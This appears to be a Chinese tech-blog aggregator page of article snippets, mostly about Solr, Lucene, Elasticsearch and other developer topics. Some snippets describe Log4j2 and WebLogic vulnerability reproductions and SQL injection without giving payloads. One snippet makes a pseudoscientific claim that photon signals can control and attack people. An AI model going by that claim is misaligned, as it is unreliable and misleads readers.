译者按：本文是来自一家乌克兰技术公司的文章。该文章译者认为着重在应用上，而非单纯的性能对比。给自己的平台选择一个合适的搜索引擎比任何一个吹嘘技术强大的好。虽然最近一两年ES发展飞速，但sphinx的简单易用性还是赢得很多机构公司的青睐，比如优酷土豆都是用sphinx。所以使用之前，务必先了解自己的业务诉求，再选择合适的搜索引擎，而非一昧跟风。翻译若有误请指正，谢谢查看！编译自：ELASTICSEA
阿里P8架构师谈：开源搜索引擎Lucene、Solr、Sphinx等优劣势比较 liuhuiteng 中间件中间件
开源搜索引擎分类1.Lucene系搜索引擎，java开发,包括：LuceneSolrElasticsearchKatta、Compass等都是基于Lucene封装。你可以想象Lucene系有多强大。2.Sphinx搜素引擎，c++开发,简单高性能。以下重点介绍最常用的开源搜素引擎：Lucene、Solr、Elasticsearch、Sphinx的特点和优劣势选型比较。Lucene1.Lucene简
使用solr6.0搭建solrCloud 牛初九
使用solr6.0搭建solrCloud一、搭建zookeeper集群下载zookeeper压缩包到自己的目录并解压（本例中的目录在/opt下），zookeeper的根目录我们在这里用${ZK_HOME}表示。在${ZK_HOME}/conf下创建zoo.cfg文件，可以复制zoo_sample.cfg文件：cpzoo_sample.cfgzoo.cfg修改zoo.cfg的内容如下：vimzoo.
Error CREATEing SolrCore 'index': Unable to create core: index Caused by: No enum constant org.apach 杉斯狼后台 Java solr enum 索引 lucene
ErrorCREATEingSolrCore'index':Unabletocreatecore:indexCausedby:Noenumconstantorg.apache.lucene.util.Version.LUCENE_48出错原因：solr版本配置不正确解决方法：在索引文件的目录下conf>solrconfig.xml4.8将4.8修改为4.7（你具体的版本，可以参照collectio
solr 或查询 or query 杉斯狼 solr solr java web java lucene
MenuId:(472e44eaac735772ef44366OR80f24930dcf7131262d9OR51e8f9844f8bd1283ac)如上句，格式为key:(value1ORvalue2ORvalue3OR...)注意，OR必须为大写，同时两边各有一空格。
尚学堂102天总结+springdata-redis 人间草木为伴
102天行百里者半九十，想要在一个行业里成为顶尖人才，一定满足一万小时定律，要想学好JAVA，需要持之以恒不断地努力,每天都要勤思考+善于询问+解决问题!知识温故而知新>>>>>>Linux下安装solr的教程555.pngSpringBoot2.2以上版本添加junit进行测试的方法h111.pngMaven依赖中标签的作用image.png./的作用和用法image.png启动和关闭redis
开源大数据集群部署（九）Ranger审计日志集成（solr）大数据部署
作者：櫰木1、下载solr安装包并解压包tar-xzvfsolr-8.11.2.gzcdsolr-8.11.2执行安装脚本./bin/install_solr_service.sh/opt/solr-8.11.2.tgz安装后，会在/etc/default/下生成solr.in.sh文件。2、在rangeradmin下生成solr相关配置cd/opt/ranger-2.3.0-admin/cont
Lucene/Solr/Elasticsearch可视化工具luke的下载及使用景小悦 lucene luke elasticsearch solr
※※使用的luke版本一定与lucene一致，否则会出现问题。luke下载地址：https://github.com/DmitryKey/luke/releasesluke是一个用于Lucene/Solr/Elasticsearch搜索引擎，方便开发和诊断的GUI（可视化）工具。luke:Luke是查询LUCENE索引文件的工具，而且用Luke的Search可以做查询Lukeisahandydev
CVE-2017-12149漏洞复现黑客大佬漏洞复现 web安全安全网络 python
服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish漏洞复现中间件及框架列表：IIS，Apache，Nginx，Tomcat，Docker，Weblogic，JBoos，WebSphere，Jenkins，GlassFish，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等1、中间件-Web
【知识整理】技术新人的培养计划卢卡上学文心一言 AIGC 人工智能 php 技术团队新人培养 git
一、培养计划落地实操1.概要新人入职，要给予适当的指导，目标：1、熟悉当前环境：生活环境：吃饭、交通、住宿、娱乐工作环境：使用的工具，Mac、maven、git、idea等2、熟悉并掌握工作技能：技术栈：Spring、Hibernate、Cache、Solr、MySQL（根据公司内部技术使用调整）内部协作工具：wiki（Confluence）、task（JIRA）、git（Stash）快捷操作：M
Apache Log4j2漏洞复现（反弹shell）安全菜 apache
0x01漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，ApacheStruts2、ApacheSolr、ApacheDruid、Apa
2021最新版 ElasticSearch 7.6.1 教程详解爬虫jsoup+es模拟京东搜索（狂神说） Super_Song_ 中间件 elasticsearch 搜索引擎 java nosql
文章目录一、ElasticSearch简介1.了解创始人DougCutting2.Lucene简介3.ElasticSearch简介4.ElasticSearch和Solr的区别5.了解ELK二、软件安装1.ElasticSearch2.ElasticSearchHead3.Kibana三、ElasticSearch使用详解1.ES核心概念文档索引倒排索引ik分词器2.命令模式的使用Rest风格说
大数据用户画像系统架构设计充电了么
文章目录一、用户画像数据仓库搭建、数据抽取部分二、大数据平台、用户画像集市分层设计、处理三、离线计算部分四、实时计算部分五、Solr/ES搜索引擎部分六、JavaWeb毫秒级实时用户画像接口服务七、用户画像实时展示异步触发获取Web自助后台总结用户画像是一个非常通用普遍使用的系统，从我们的架构图中可以看出，从数据计算时效性上来讲分离线计算和实时计算。离线计算一般是每天晚上全量计算所有用户，或者按需
Apache Log4j2 漏洞原理仲瑿漏洞原理 apache log4j java
ApacheLog4j远程代码执行漏洞1.漏洞危害ApacheLog4j被发现存在一处任意代码执行漏洞，由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。经验证，ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等众多组件与大型应用均受影响2.影响版本ApacheLog4j2.x<=2.14.13.漏
rm: relocation error: /lib64/libc.so.6: symbol _dl_starting_up, version GLIBC_PRIVATE not defined in feifeidata
由于安装glibc-2.23.tar.gz导致系统出错，命令不能用恢复方法：进入/usr/lib64目录，使用ls-ltr命令ls-ltrlrwxrwxrwx.1rootroot2112月1421:46ld-linux-x86-64.so.2->/usr/lib64/ld-2.17.solrwxrwxrwx.1rootroot2312月1421:51libc.so.6->/usr/lib64/li
安全漏洞(1)-Log4j2远程代码执行漏洞，log4j2漏洞验证迷途的小兵安全体系_加解密算法安全 log4j2 安全漏洞
漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等均受影响。漏洞评级CVE-2021
揭秘Elasticsearch：一文读懂分布式搜索与分析引擎的核心概念超越不平凡 elasticsearch 分布式大数据
Elasticsearch是一个开源、分布式、实时搜索和分析引擎，专门用于处理大规模数据的快速检索与分析。它建立在ApacheLucene的基础上，但提供了比Lucene更为丰富的功能和友好的RESTfulAPI接口，使得开发者能够轻松地进行全文搜索、结构化搜索以及对海量数据进行复杂的聚合操作。Elasticsearch目前被广泛用于互联网多种领域中。一是搜索领域，相对于solr，成为很多搜索的不
07、全文检索 -- Solr -- Solr 全文检索之为索引库添加中文分词器 _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr 中文分词
目录Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词器的jar包2、修改managed-schema配置文件什么是fieldType3、添加停用词文档4、重启solr5、添加【*_cn】动态字段，并为该字段设置中文分词器6、演示分词器的区别演示text_cjk这个简单的分词器演示text_cn这个中文分词器Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词
全文检索服务器：Solr xiayehuimou solr solr 全文检索服务器
官网https://solr.apache.org/官方文档https://solr.apache.org/guide/solr/latest/deployment-guide/solrj.html1.介绍Solr是一个高性能，采用Java开发，基于Lucene的开源全文搜索服务器不仅限于搜索，Solr也可以用于存储目的。像其他NoSQL数据库一样，它是一种非关系数据存储和处理技术。solr需要运
php solr 全文检索引擎,【搜索引擎】Solr Suggester 实现全文检索功能-分词和和自动提示... 一十马 php solr 全文检索引擎
功能需求全文检索搜索引擎都会有这样一个功能：输入一个字符便自动提示出可选的短语：要实现这种功能，可以利用solr的SuggestComponent，SuggestComponent这种方法利用Lucene的Suggester实现，并支持Lucene中可用的所有查找实现。实现1.配置managed-schema文件配置自己core文件夹conf下的managed-schema文件这个是自己的字段：新
数据采集高并发的架构应用 3golden .net
问题的出发点：最近公司为了发展需要，要扩大对用户的信息采集，每个用户的采集量估计约2W。如果用户量增加的话，将会大量照成采集量成3W倍的增长，但是又要满足日常业务需要，特别是指令要及时得到响应的频率次数远大于预期。 &n
不停止 MySQL 服务增加从库的两种方式 brotherlamp linux linux视频 linux资料 linux教程 linux自学
现在生产环境MySQL数据库是一主一从，由于业务量访问不断增大，故再增加一台从库。前提是不能影响线上业务使用，也就是说不能重启MySQL服务，为了避免出现其他情况，选择在网站访问量低峰期时间段操作。一般在线增加从库有两种方式，一种是通过mysqldump备份主库，恢复到从库，mysqldump是逻辑备份，数据量大时，备份速度会很慢，锁表的时间也会很长。另一种是通过xtrabacku
Quartz——SimpleTrigger触发器 eksliang SimpleTrigger TriggerUtils quartz
转载请出自出处：http://eksliang.iteye.com/blog/2208166 一.概述 SimpleTrigger触发器，当且仅需触发一次或者以固定时间间隔周期触发执行；二.SimpleTrigger的构造函数 SimpleTrigger(String name, String group)：通过该构造函数指定Trigger所属组和名称； Simpl
Informatica应用（1） 18289753290 sql workflow lookup 组件 Informatica
1.如果要在workflow中调用shell脚本有一个command组件，在里面设置shell的路径；调度wf可以右键出现schedule，现在用的是HP的tidal调度wf的执行。 2.designer里面的router类似于SSIS中的broadcast（多播组件）;Reset_Workflow_Var：参数重置（比如说我这个参数初始是1在workflow跑得过程中变成了3我要在结束时还要
python 获取图片验证码中文字酷的飞上天空 python
根据现成的开源项目 http://code.google.com/p/pytesser/改写在window上用easy_install安装不上看了下源码发现代码很少于是就想自己改写一下添加支持网络图片的直接解析 #coding:utf-8 #import sys #reload(sys) #sys.s
AJAX 永夜-极光 Ajax
1.AJAX功能:动态更新页面,减少流量消耗,减轻服务器负担 2.代码结构: <html> <head> <script type="text/javascript"> function loadXMLDoc() { .... AJAX script goes here ...
创业OR读研随便小屋创业
现在研一，有种想创业的想法，不知道该不该去实施。因为对于的我情况这两者是矛盾的，可能就是鱼与熊掌不能兼得。研一的生活刚刚过去两个月，我们学校主要的是
需求做得好与坏直接关系着程序员生活质量 aijuans IT 生活
这个故事还得从去年换工作的事情说起，由于自己不太喜欢第一家公司的环境我选择了换一份工作。去年九月份我入职现在的这家公司，专门从事金融业内软件的开发。十一月份我们整个项目组前往北京做现场开发，从此苦逼的日子开始了。系统背景：五月份就有同事前往甲方了解需求一直到6月份，后续几个月也完
如何定义和区分高级软件开发工程师 aoyouzi
在软件开发领域，高级开发工程师通常是指那些编写代码超过 3 年的人。这些人可能会被放到领导的位置，但经常会产生非常糟糕的结果。Matt Briggs 是一名高级开发工程师兼 Scrum 管理员。他认为，单纯使用年限来划分开发人员存在问题，两个同样具有 10 年开发经验的开发人员可能大不相同。近日，他发表了一篇博文，根据开发者所能发挥的作用划分软件开发工程师的成长阶段。　　初
Servlet的请求与响应百合不是茶 servlet get提交 java处理post提交
Servlet是tomcat中的一个重要组成,也是负责客户端和服务端的中介 1,Http的请求方式(get ,post); 客户端的请求一般都会都是Servlet来接受的,在接收之前怎么来确定是那种方式提交的,以及如何反馈,Servlet中有相应的方法, http的get方式 servlet就是都doGet(
web.xml配置详解之listener bijian1013 java web.xml listener
一.定义 <listener> <listen-class>com.myapp.MyListener</listen-class> </listener> 二.作用该元素用来注册一个监听器类。可以收到事件什么时候发生以及用什么作为响
Web页面性能优化（yahoo技术） Bill_chen JavaScript Ajax Web css Yahoo
1.尽可能的减少HTTP请求数 content 2.使用CDN server 3.添加Expires头(或者 Cache-control) server 4.Gzip 组件 server 5.把CSS样式放在页面的上方。 css 6.将脚本放在底部(包括内联的) javascript 7.避免在CSS中使用Expressions css 8.将javascript和css独立成外部文
【MongoDB学习笔记八】MongoDB游标、分页查询、查询结果排序 bit1129 mongodb
游标游标，简单的说就是一个查询结果的指针。游标作为数据库的一个对象，使用它是包括声明打开循环抓去一定数目的文档直到结果集中的所有文档已经抓取完关闭游标游标的基本用法，类似于JDBC的ResultSet(hasNext判断是否抓去完,next移动游标到下一条文档)，在获取一个文档集时，可以提供一个类似JDBC的FetchSize
ORA-12514 TNS 监听程序当前无法识别连接描述符中请求服务的解决方法白糖_ ORA-12514
今天通过Oracle SQL*Plus连接远端服务器的时候提示“监听程序当前无法识别连接描述符中请求服务”，遂在网上找到了解决方案： ①打开Oracle服务器安装目录\NETWORK\ADMIN\listener.ora文件，你会看到如下信息： # listener.ora Network Configuration File: D:\database\Oracle\net
Eclipse 问题 A resource exists with a different case bozch eclipse
在使用Eclipse进行开发的时候，出现了如下的问题： Description Resource Path Location TypeThe project was not built due to "A resource exists with a different case: '/SeenTaoImp_zhV2/bin/seentao'.&
编程之美-小飞的电梯调度算法 bylijinnan 编程之美
public class AptElevator { /** * 编程之美小飞电梯调度算法 * 在繁忙的时间，每次电梯从一层往上走时，我们只允许电梯停在其中的某一层。 * 所有乘客都从一楼上电梯，到达某层楼后，电梯听下来，所有乘客再从这里爬楼梯到自己的目的层。 * 在一楼时，每个乘客选择自己的目的层，电梯则自动计算出应停的楼层。 * 问：电梯停在哪
SQL注入相关概念 chenbowen00 sql Web 安全
SQL Injection：就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。首先让我们了解什么时候可能发生SQ
[光与电]光子信号战防御原理 comsci 原理
无论是在战场上,还是在后方,敌人都有可能用光子信号对人体进行控制和攻击,那么采取什么样的防御方法,最简单,最有效呢? 我们这里有几个山寨的办法,可能有些作用,大家如果有兴趣可以去实验一下根据光
oracle 11g新特性:Pending Statistics daizj oracle dbms_stats
oracle 11g新特性:Pending Statistics 转从11g开始，表与索引的统计信息收集完毕后，可以选择收集的统信息立即发布，也可以选择使新收集的统计信息处于pending状态，待确定处于pending状态的统计信息是安全的，再使处于pending状态的统计信息发布，这样就会避免一些因为收集统计信息立即发布而导致SQL执行计划走错的灾难。在 11g 之前的版本中，D
快速理解RequireJs dengkane jquery requirejs
RequireJs已经流行很久了，我们在项目中也打算使用它。它提供了以下功能：声明不同js文件之间的依赖可以按需、并行、延时载入js库可以让我们的代码以模块化的方式组织初看起来并不复杂。在html中引入requirejs 在HTML中，添加这样的 <script> 标签： <script src="/path/to
C语言学习四流程控制if条件选择、for循环和强制类型转换 dcj3sjt126com c
# include <stdio.h> int main(void) { int i, j; scanf("%d %d", &i, &j); if (i > j) printf("i大于j\n"); else printf("i小于j\n"); retu
dictionary的使用要注意 dcj3sjt126com IO
NSDictionary *dict = [NSDictionary dictionaryWithObjectsAndKeys: user.user_id , @"id", user.username , @"username",
Android 中的资源访问(Resource) finally_m xml android String drawable color
简单的说，Android中的资源是指非代码部分。例如，在我们的Android程序中要使用一些图片来设置界面，要使用一些音频文件来设置铃声，要使用一些动画来显示特效，要使用一些字符串来显示提示信息。那么，这些图片、音频、动画和字符串等叫做Android中的资源文件。在Eclipse创建的工程中，我们可以看到res和assets两个文件夹，是用来保存资源文件的，在assets中保存的一般是原生
Spring使用Cache、整合Ehcache 234390216 spring cache ehcache @Cacheable
Spring使用Cache 从3.1开始，Spring引入了对Cache的支持。其使用方法和原理都类似于Spring对事务管理的支持。Spring Cache是作用在方法上的，其核心思想是这样的：当我们在调用一个缓存方法时会把该方法参数和返回结果作为一个键值对存放在缓存中，等到下次利用同样的
当druid遇上oracle blob(clob) jackyrong oracle
http://blog.csdn.net/renfufei/article/details/44887371 众所周知，Oracle有很多坑, 所以才有了去IOE。在使用Druid做数据库连接池后，其实偶尔也会碰到小坑，这就是使用开源项目所必须去填平的。【如果使用不开源的产品，那就不是坑，而是陷阱了，你都不知道怎么去填坑】用Druid连接池，通过JDBC往Oracle数据库的
easyui datagrid pagination获得分页页码、总页数等信息 ldzyz007
var grid = $('#datagrid'); var options = grid.datagrid('getPager').data("pagination").options; var curr = options.pageNumber; var total = options.total; var max =
浅析awk里的数组 nigelzeng 二维数组 array 数组 awk
awk绝对是文本处理中的神器，它本身也是一门编程语言，还有许多功能本人没有使用到。这篇文章就单单针对awk里的数组来进行讨论，如何利用数组来帮助完成文本分析。有这么一组数据： abcd,91#31#2012-12-31 11:24:00 case_a,136#19#2012-12-31 11:24:00 case_a,136#23#2012-12-31 1
搭建 CentOS 6 服务器(6) - TigerVNC rensanning centos
安装GNOME桌面环境 # yum groupinstall "X Window System" "Desktop" 安装TigerVNC # yum -y install tigervnc-server tigervnc 启动VNC服务 # /etc/init.d/vncserver restart # vncser
Spring 数据库连接整理 tomcat_oracle spring bean jdbc
1、数据库连接jdbc.properties配置详解　　jdbc.url=jdbc:hsqldb:hsql://localhost/xdb 　　jdbc.username=sa 　　jdbc.password= 　　jdbc.driver=不同的数据库厂商驱动，此处不一一列举　　接下来，详细配置代码如下：　　 Spring连接池
Dom4J解析使用xpath java.lang.NoClassDefFoundError: org/jaxen/JaxenException异常 xp9802
用Dom4J解析xml,以前没注意,今天使用dom4j包解析xml时在xpath使用处报错异常栈：java.lang.NoClassDefFoundError: org/jaxen/JaxenException异常导入包 jaxen-1.1-beta-6.jar 解决; &nb